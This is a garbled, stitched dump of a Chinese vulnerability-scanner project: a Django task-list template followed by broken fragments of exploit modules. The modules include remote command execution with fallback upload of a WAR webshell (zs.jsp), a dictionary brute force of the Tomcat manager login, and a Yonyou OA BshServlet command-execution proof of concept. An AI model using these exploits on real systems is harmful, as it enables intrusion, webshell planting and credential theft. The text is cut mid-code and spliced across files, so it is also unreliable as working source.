| 序号 | 12 | {% if mode != 'fofa' %} 13 |扫描范围 | 14 | {% else %} 15 |查询语句 | 16 | {% endif %} 17 |任务描述 | 18 |创建日期 | 19 |服务扫描 | 20 |漏洞扫描 | 21 |删除 | 22 |
|---|---|---|---|---|---|---|---|
| {{ forloop.counter }} | 26 |{{ i.ip_range }} | 27 |28 | 29 | {{ i.description }} 30 | 31 | | 32 |{{ i.start_time }} | 33 |34 | 35 | {% if i.service_process == i.task_count %} 36 | 已完成 37 | {% else %} 38 | 未完成 39 | {% endif %} 40 | 41 | | 42 |43 | 44 | {% if i.vuln_process == i.vuln_count and i.vuln_count != 0 %} 45 | 已完成 46 | {% else %} 47 | 未完成 48 | {% endif %} 49 | 50 | | 51 |52 | 55 | | 56 |
(.*?)", resp.content.replace(b'\x00', b''), re.DOTALL)[0].decode() 22 | else: 23 | return False 24 | 25 | def exp(vuln: VulnScan, cmd, content=""): 26 | result = rce(vuln.url, cmd) 27 | if not result: 28 | upload_war(vuln.url, vuln.specify) 29 | result = rce(vuln.url, cmd) 30 | return "shell地址: \n%s" % f"{vuln.url}/zs/zs.jsp\n输出结果:\n" + str(result) -------------------------------------------------------------------------------- /vulscan_Project/modules/burp_tomcat_poc.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import time 3 | 4 | from vulscan_Project import requestUtil 5 | from .. import fileUtil 6 | 7 | 8 | def tomcat_poc(url): 9 | with fileUtil.open_file("dict_tomcat/dic_tomcat_key.txt", "r") as f: 10 | for i in f.readlines(): 11 | authorized_key = i.strip() 12 | resp = requestUtil.get(url + "/manager/html", header={ 13 | "Authorization": "Basic %s" % (base64.b64encode(authorized_key.encode()).decode())}) 14 | if "Tomcat Host Manager Application" in resp.text: 15 | return (["tomcat弱密码", "用户名:%s
(.*?)', resp.text, re.DOTALL)[0].strip() 11 | if type == "poc": 12 | result = ["用友OA_BshServlet接口泄露", "cmd: whoami